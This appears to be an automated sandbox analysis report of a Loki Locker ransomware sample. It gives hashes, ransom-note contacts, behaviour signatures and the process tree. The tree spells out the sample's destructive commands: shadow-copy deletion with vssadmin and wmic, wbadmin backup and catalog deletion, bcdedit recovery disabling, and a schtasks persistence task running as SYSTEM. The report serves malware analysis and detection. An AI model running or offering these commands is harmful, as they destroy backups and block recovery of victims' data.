Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
09-05-2022 19:12
Static task
static1
Behavioral task
behavioral1
Sample
tmp.exe
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
tmp.exe
Resource
win10v2004-20220414-en
General
-
Target
tmp.exe
-
Size
484KB
-
MD5
8b062fa952cc294d7db09794e2d44ce0
-
SHA1
ce13e42217f7d0e950dd8ae5ee5ec8d5be6af177
-
SHA256
71d0c896720e01be1b6b095fc8917bcac38f8bc8ed3caba8bf9c2a4fcdde1747
-
SHA512
a6643699544db21955c927e9a7cdfd1c056c7078e27d9c68ff68865c240ff3dfd0f8aecd7f4926b9746eaa989b3cbef681e5ffd19c643cd02a7faba2534ed26d
Malware Config
Extracted
C:\Restore-My-Files.txt
DecryptionCenter@gmail.com
DecryptionCenter@outlook.com
Extracted
C:\Users\Admin\AppData\Local\Temp\info.hta
DecryptionCenter@gmail.com
DecryptionCenter@outlook.com
Signatures
-
Lockbit
Ransomware family with multiple variants released since late 2019.
-
suricata: ET MALWARE Loki Locker Ransomware CnC Activity
suricata: ET MALWARE Loki Locker Ransomware CnC Activity
-
suricata: ET MALWARE Loki Locker Ransomware CnC Domain in DNS Lookup
suricata: ET MALWARE Loki Locker Ransomware CnC Domain in DNS Lookup
-
suricata: ET MALWARE Loki Locker Ransomware User-Agent
suricata: ET MALWARE Loki Locker Ransomware User-Agent
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exebcdedit.exepid process 4772 bcdedit.exe 3900 bcdedit.exe -
Processes:
wbadmin.exepid process 2588 wbadmin.exe -
Processes:
wbadmin.exepid process 4416 wbadmin.exe -
Disables Task Manager via registry modification
-
Modifies Windows Firewall 1 TTPs
-
Modifies extensions of user files 1 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
tmp.exedescription ioc process File opened for modification C:\Users\Admin\Pictures\RenameEnable.tiff tmp.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
tmp.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation tmp.exe -
Drops startup file 3 IoCs
Processes:
tmp.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winlogon.exe tmp.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winlogon.exe tmp.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wvtymcow.bat tmp.exe -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
tmp.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Michael Gillespie = "C:\\ProgramData\\winlogon.exe" tmp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Michael Gillespie = "C:\\Windows\\winlogon.exe" tmp.exe -
Drops desktop.ini file(s) 28 IoCs
Processes:
tmp.exedescription ioc process File opened for modification C:\Users\Public\Downloads\desktop.ini tmp.exe File opened for modification C:\Users\Public\desktop.ini tmp.exe File opened for modification C:\Program Files (x86)\desktop.ini tmp.exe File opened for modification C:\Users\Admin\Pictures\Camera Roll\desktop.ini tmp.exe File opened for modification C:\Users\Admin\Saved Games\desktop.ini tmp.exe File opened for modification C:\Users\Admin\Videos\desktop.ini tmp.exe File opened for modification C:\Users\Public\Libraries\desktop.ini tmp.exe File opened for modification C:\Program Files\desktop.ini tmp.exe File opened for modification C:\Users\Admin\Favorites\desktop.ini tmp.exe File opened for modification C:\Users\Admin\Links\desktop.ini tmp.exe File opened for modification C:\Users\Admin\Searches\desktop.ini tmp.exe File opened for modification C:\Users\Public\Pictures\desktop.ini tmp.exe File opened for modification C:\Users\Admin\Downloads\desktop.ini tmp.exe File opened for modification C:\Users\Admin\Music\desktop.ini tmp.exe File opened for modification C:\Users\Admin\Desktop\desktop.ini tmp.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI tmp.exe File opened for modification C:\Users\Public\AccountPictures\desktop.ini tmp.exe File opened for modification C:\Users\Public\Documents\desktop.ini tmp.exe File opened for modification C:\Users\Admin\3D Objects\desktop.ini tmp.exe File opened for modification C:\Users\Admin\Pictures\desktop.ini tmp.exe File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini tmp.exe File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini tmp.exe File opened for modification C:\Users\Admin\Contacts\desktop.ini tmp.exe File opened for modification C:\Users\Admin\Documents\desktop.ini tmp.exe File opened for modification C:\Users\Admin\OneDrive\desktop.ini tmp.exe File opened for modification C:\Users\Public\Desktop\desktop.ini tmp.exe File opened for modification C:\Users\Public\Music\desktop.ini tmp.exe File opened for modification C:\Users\Public\Videos\desktop.ini tmp.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
tmp.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\kjfb04uq.Loki" tmp.exe -
Drops file in Program Files directory 64 IoCs
Processes:
tmp.exedescription ioc process File opened for modification C:\Program Files\Google\Chrome\Application\89.0.4389.114\default_apps\docs.crx tmp.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-favorites_ja.jar tmp.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\cardview-linkedentity-dark@4x.png tmp.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ka\LC_MESSAGES\vlc.mo tmp.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_x64__8wekyb3d8bbwe\Assets\GetStartedAppList.targetsize-40.png tmp.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\ipsjpn.xml tmp.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\cardview-addtotable@3x.png tmp.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxApp_48.49.31001.0_x64__8wekyb3d8bbwe\Assets\GamesXboxHubAppList.targetsize-256_altform-unplated_contrast-high.png tmp.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_x64__8wekyb3d8bbwe\Assets\contrast-white\MicrosoftLogo.scale-200.png tmp.exe File opened for modification C:\Program Files\Google\Chrome\Application\89.0.4389.114\chrome_200_percent.pak tmp.exe File created C:\Program Files\Microsoft Office\root\Client\Restore-My-Files.txt tmp.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\CancelFluent@3x.png tmp.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\be\LC_MESSAGES\vlc.mo tmp.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\http.luac tmp.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\Images\Stickers\Thumbnails\Sticker_Icon_Star.png tmp.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.StorePurchaseApp_11811.1001.18.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-white\StoreMedTile.scale-200.png tmp.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\images\themes\dark\digsig_icons_2x.png tmp.exe File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\en-us\Restore-My-Files.txt tmp.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\en-gb\locimages\offsymxb.ttf tmp.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\ControlStyles.xbf tmp.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioStdO365R_Subscription-ul-oob.xrm-ms tmp.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\mr.pak.DATA tmp.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Home\RTL\contrast-black\LargeTile.scale-125.png tmp.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\WidevineCdm\_platform_specific\win_x64\widevinecdm.dll.sig tmp.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\ExchangeLargeTile.scale-100.png tmp.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\OutlookMailBadge.scale-400.png tmp.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\plugins\rhp\exportpdfupsell-app-tool-view.js tmp.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.emf.ecore.xmi_2.10.1.v20140901-1043.jar tmp.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\OutlookR_OEM_Perp-ul-oob.xrm-ms tmp.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\Cartridges\sqlpdw.xsl tmp.exe File created C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.513.0_neutral_~_8wekyb3d8bbwe\Restore-My-Files.txt tmp.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\LyncVDI_Eula.txt tmp.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-48_altform-unplated_contrast-white.png tmp.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\en-gb\Restore-My-Files.txt tmp.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\CANYON\CANYON.ELM tmp.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\ThreeWayBlendPage.xbf tmp.exe File opened for modification C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\DSCResources\MSFT_PackageManagement\ja-JP\MSFT_PackageManagement.schema.mfl tmp.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ja-jp\Restore-My-Files.txt tmp.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\lt-LT\tipresx.dll.mui tmp.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectStd2019R_Retail-ppd.xrm-ms tmp.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.contrast-black_targetsize-40.png tmp.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\zh-tw\ui-strings.js tmp.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\ja-jp\ui-strings.js tmp.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\Assets\contrast-black\SmallTile.scale-100_contrast-black.png tmp.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.XboxApp_48.49.31001.0_neutral_split.scale-125_8wekyb3d8bbwe\AppxManifest.xml tmp.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_x64__8wekyb3d8bbwe\Assets\GetStartedAppList.targetsize-40_altform-unplated.png tmp.exe File opened for modification C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml tmp.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_x64__8wekyb3d8bbwe\Assets\dismiss.contrast-white.png tmp.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\ExchangeLargeTile.scale-150.png tmp.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxApp_48.49.31001.0_x64__8wekyb3d8bbwe\AppxMetadata\CodeIntegrity.cat tmp.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.services.nl_ja_4.4.0.v20140623020002.jar tmp.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\THIRDPARTYLICENSEREADME.txt tmp.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\EmptyShare-Dark.scale-100.png tmp.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\Programmer.targetsize-16_contrast-white.png tmp.exe File created C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1907.3152.0_x64__8wekyb3d8bbwe\Assets\ThankYou\Restore-My-Files.txt tmp.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\arrow-down.png tmp.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTest5-ppd.xrm-ms tmp.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.4.8204.0_x64__8wekyb3d8bbwe\AppxManifest.xml tmp.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.4.8204.0_x64__8wekyb3d8bbwe\Win10\Classic\Pyramid.Wide.png tmp.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\en-ae\ui-strings.js tmp.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-24_altform-unplated_contrast-white.png tmp.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxCalendarLargeTile.scale-150.png tmp.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Review_RHP.aapp tmp.exe File created C:\Program Files\Microsoft Office\root\Office16\MSIPC\hi\Restore-My-Files.txt tmp.exe -
Drops file in Windows directory 5 IoCs
Processes:
tmp.exewbadmin.exedescription ioc process File created C:\Windows\winlogon.exe tmp.exe File opened for modification C:\Windows\winlogon.exe tmp.exe File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.3.etl wbadmin.exe File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.2.etl wbadmin.exe File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.1.etl wbadmin.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
vds.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 4368 vssadmin.exe -
Modifies Control Panel 2 IoCs
Processes:
tmp.exedescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\Desktop\WallpaperStyle = "2" tmp.exe Set value (str) \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\Desktop\TileWallpaper = "0" tmp.exe -
Modifies registry class 8 IoCs
Processes:
tmp.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Loki\ = "Loki" tmp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Loki\shell\open\command tmp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Loki tmp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Loki\shell tmp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Loki\shell\open tmp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Loki\shell\open\command\ = "C:\\ProgramData\\bpevytwo.exe \"%l\" " tmp.exe Key created \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\Local Settings tmp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Loki tmp.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
tmp.exepid process 2736 tmp.exe 2736 tmp.exe 2736 tmp.exe 2736 tmp.exe 2736 tmp.exe 2736 tmp.exe 2736 tmp.exe 2736 tmp.exe 2736 tmp.exe 2736 tmp.exe 2736 tmp.exe 2736 tmp.exe 2736 tmp.exe 2736 tmp.exe 2736 tmp.exe 2736 tmp.exe 2736 tmp.exe 2736 tmp.exe 2736 tmp.exe 2736 tmp.exe 2736 tmp.exe 2736 tmp.exe 2736 tmp.exe 2736 tmp.exe 2736 tmp.exe 2736 tmp.exe 2736 tmp.exe 2736 tmp.exe 2736 tmp.exe 2736 tmp.exe 2736 tmp.exe 2736 tmp.exe 2736 tmp.exe 2736 tmp.exe 2736 tmp.exe 2736 tmp.exe 2736 tmp.exe 2736 tmp.exe 2736 tmp.exe 2736 tmp.exe 2736 tmp.exe 2736 tmp.exe 2736 tmp.exe 2736 tmp.exe 2736 tmp.exe 2736 tmp.exe 2736 tmp.exe 2736 tmp.exe 2736 tmp.exe 2736 tmp.exe 2736 tmp.exe 2736 tmp.exe 2736 tmp.exe 2736 tmp.exe 2736 tmp.exe 2736 tmp.exe 2736 tmp.exe 2736 tmp.exe 2736 tmp.exe 2736 tmp.exe 2736 tmp.exe 2736 tmp.exe 2736 tmp.exe 2736 tmp.exe -
Suspicious use of AdjustPrivilegeToken 50 IoCs
Processes:
tmp.exeWMIC.exewbengine.exevssvc.exedescription pid process Token: SeDebugPrivilege 2736 tmp.exe Token: SeIncreaseQuotaPrivilege 2740 WMIC.exe Token: SeSecurityPrivilege 2740 WMIC.exe Token: SeTakeOwnershipPrivilege 2740 WMIC.exe Token: SeLoadDriverPrivilege 2740 WMIC.exe Token: SeSystemProfilePrivilege 2740 WMIC.exe Token: SeSystemtimePrivilege 2740 WMIC.exe Token: SeProfSingleProcessPrivilege 2740 WMIC.exe Token: SeIncBasePriorityPrivilege 2740 WMIC.exe Token: SeCreatePagefilePrivilege 2740 WMIC.exe Token: SeBackupPrivilege 2740 WMIC.exe Token: SeRestorePrivilege 2740 WMIC.exe Token: SeShutdownPrivilege 2740 WMIC.exe Token: SeDebugPrivilege 2740 WMIC.exe Token: SeSystemEnvironmentPrivilege 2740 WMIC.exe Token: SeRemoteShutdownPrivilege 2740 WMIC.exe Token: SeUndockPrivilege 2740 WMIC.exe Token: SeManageVolumePrivilege 2740 WMIC.exe Token: 33 2740 WMIC.exe Token: 34 2740 WMIC.exe Token: 35 2740 WMIC.exe Token: 36 2740 WMIC.exe Token: SeIncreaseQuotaPrivilege 2740 WMIC.exe Token: SeSecurityPrivilege 2740 WMIC.exe Token: SeTakeOwnershipPrivilege 2740 WMIC.exe Token: SeLoadDriverPrivilege 2740 WMIC.exe Token: SeSystemProfilePrivilege 2740 WMIC.exe Token: SeSystemtimePrivilege 2740 WMIC.exe Token: SeProfSingleProcessPrivilege 2740 WMIC.exe Token: SeIncBasePriorityPrivilege 2740 WMIC.exe Token: SeCreatePagefilePrivilege 2740 WMIC.exe Token: SeBackupPrivilege 2740 WMIC.exe Token: SeRestorePrivilege 2740 WMIC.exe Token: SeShutdownPrivilege 2740 WMIC.exe Token: SeDebugPrivilege 2740 WMIC.exe Token: SeSystemEnvironmentPrivilege 2740 WMIC.exe Token: SeRemoteShutdownPrivilege 2740 WMIC.exe Token: SeUndockPrivilege 2740 WMIC.exe Token: SeManageVolumePrivilege 2740 WMIC.exe Token: 33 2740 WMIC.exe Token: 34 2740 WMIC.exe Token: 35 2740 WMIC.exe Token: 36 2740 WMIC.exe Token: SeBackupPrivilege 4468 wbengine.exe Token: SeRestorePrivilege 4468 wbengine.exe Token: SeSecurityPrivilege 4468 wbengine.exe Token: SeBackupPrivilege 1960 vssvc.exe Token: SeRestorePrivilege 1960 vssvc.exe Token: SeAuditPrivilege 1960 vssvc.exe Token: SeDebugPrivilege 2736 tmp.exe -
Suspicious use of WriteProcessMemory 55 IoCs
Processes:
tmp.execmd.execsc.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 2736 wrote to memory of 3100 2736 tmp.exe cmd.exe PID 2736 wrote to memory of 3100 2736 tmp.exe cmd.exe PID 2736 wrote to memory of 2024 2736 tmp.exe csc.exe PID 2736 wrote to memory of 2024 2736 tmp.exe csc.exe PID 3100 wrote to memory of 5008 3100 cmd.exe schtasks.exe PID 3100 wrote to memory of 5008 3100 cmd.exe schtasks.exe PID 2024 wrote to memory of 4996 2024 csc.exe cvtres.exe PID 2024 wrote to memory of 4996 2024 csc.exe cvtres.exe PID 2736 wrote to memory of 532 2736 tmp.exe cmd.exe PID 2736 wrote to memory of 532 2736 tmp.exe cmd.exe PID 2736 wrote to memory of 2812 2736 tmp.exe cmd.exe PID 2736 wrote to memory of 2812 2736 tmp.exe cmd.exe PID 2736 wrote to memory of 616 2736 tmp.exe cmd.exe PID 2736 wrote to memory of 616 2736 tmp.exe cmd.exe PID 2736 wrote to memory of 1388 2736 tmp.exe cmd.exe PID 2736 wrote to memory of 1388 2736 tmp.exe cmd.exe PID 2736 wrote to memory of 904 2736 tmp.exe cmd.exe PID 2736 wrote to memory of 904 2736 tmp.exe cmd.exe PID 2736 wrote to memory of 1180 2736 tmp.exe cmd.exe PID 2736 wrote to memory of 1180 2736 tmp.exe cmd.exe PID 2736 wrote to memory of 516 2736 tmp.exe cmd.exe PID 2736 wrote to memory of 516 2736 tmp.exe cmd.exe PID 2812 wrote to memory of 2588 2812 cmd.exe wbadmin.exe PID 2812 wrote to memory of 2588 2812 cmd.exe wbadmin.exe PID 616 wrote to memory of 2740 616 cmd.exe WMIC.exe PID 616 wrote to memory of 2740 616 cmd.exe WMIC.exe PID 2736 wrote to memory of 1816 2736 tmp.exe cmd.exe PID 2736 wrote to memory of 1816 2736 tmp.exe cmd.exe PID 532 wrote to memory of 4368 532 cmd.exe vssadmin.exe PID 532 wrote to memory of 4368 532 cmd.exe vssadmin.exe PID 1388 wrote to memory of 4416 1388 cmd.exe wbadmin.exe PID 1388 wrote to memory of 4416 1388 cmd.exe wbadmin.exe PID 904 wrote to memory of 4772 904 cmd.exe bcdedit.exe PID 904 wrote to memory of 4772 904 cmd.exe bcdedit.exe PID 1180 wrote to memory of 3900 1180 cmd.exe bcdedit.exe PID 1180 wrote to memory of 3900 1180 cmd.exe bcdedit.exe PID 1816 wrote to memory of 3276 1816 cmd.exe netsh.exe PID 1816 wrote to memory of 3276 1816 cmd.exe netsh.exe PID 516 wrote to memory of 4484 516 cmd.exe netsh.exe PID 516 wrote to memory of 4484 516 cmd.exe netsh.exe PID 2736 wrote to memory of 4688 2736 tmp.exe mshta.exe PID 2736 wrote to memory of 4688 2736 tmp.exe mshta.exe PID 2736 wrote to memory of 4688 2736 tmp.exe mshta.exe PID 2736 wrote to memory of 3048 2736 tmp.exe mshta.exe PID 2736 wrote to memory of 3048 2736 tmp.exe mshta.exe PID 2736 wrote to memory of 3048 2736 tmp.exe mshta.exe PID 2736 wrote to memory of 4920 2736 tmp.exe mshta.exe PID 2736 wrote to memory of 4920 2736 tmp.exe mshta.exe PID 2736 wrote to memory of 4920 2736 tmp.exe mshta.exe PID 2736 wrote to memory of 292 2736 tmp.exe mshta.exe PID 2736 wrote to memory of 292 2736 tmp.exe mshta.exe PID 2736 wrote to memory of 292 2736 tmp.exe mshta.exe PID 2736 wrote to memory of 4384 2736 tmp.exe mshta.exe PID 2736 wrote to memory of 4384 2736 tmp.exe mshta.exe PID 2736 wrote to memory of 4384 2736 tmp.exe mshta.exe -
System policy modification 1 TTPs 2 IoCs
Processes:
tmp.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption = "Encrypted by Loki locker" tmp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext = "All your files have been encrypted due to a security problem with your computer\r\nIf you want to restore them, write us to the e-mail: DecryptionCenter@gmail.com\r\nWrite this ID in the title of your message: B00E6D83\r\nIn case of no answer in 24 hours write us to this e-mail: DecryptionCenter@outlook.com" tmp.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmp.exe"1⤵
- Modifies extensions of user files
- Checks computer location settings
- Drops startup file
- Adds Run key to start application
- Drops desktop.ini file(s)
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies Control Panel
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /CREATE /SC ONLOGON /TN Loki /TR C:\Users\Admin\AppData\Roaming\winlogon.exe /RU SYSTEM /RL HIGHEST /F2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /TN Loki /TR C:\Users\Admin\AppData\Roaming\winlogon.exe /RU SYSTEM /RL HIGHEST /F3⤵
- Creates scheduled task(s)
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\yoikjizn\yoikjizn.cmdline"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES351A.tmp" "c:\ProgramData\CSC92A2AE7CFC0E4AAB9B11A0211339996E.TMP"3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quiet3⤵
- Interacts with shadow copies
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C wbadmin DELETE SYSTEMSTATEBACKUP2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wbadmin.exewbadmin DELETE SYSTEMSTATEBACKUP3⤵
- Deletes System State backups
- Drops file in Windows directory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C wmic shadowcopy delete2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic shadowcopy delete3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wbadmin.exewbadmin delete catalog -quiet3⤵
- Deletes backup catalog
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures3⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C bcdedit /set {default} recoveryenabled no2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled no3⤵
- Modifies boot configuration data using bcdedit
-
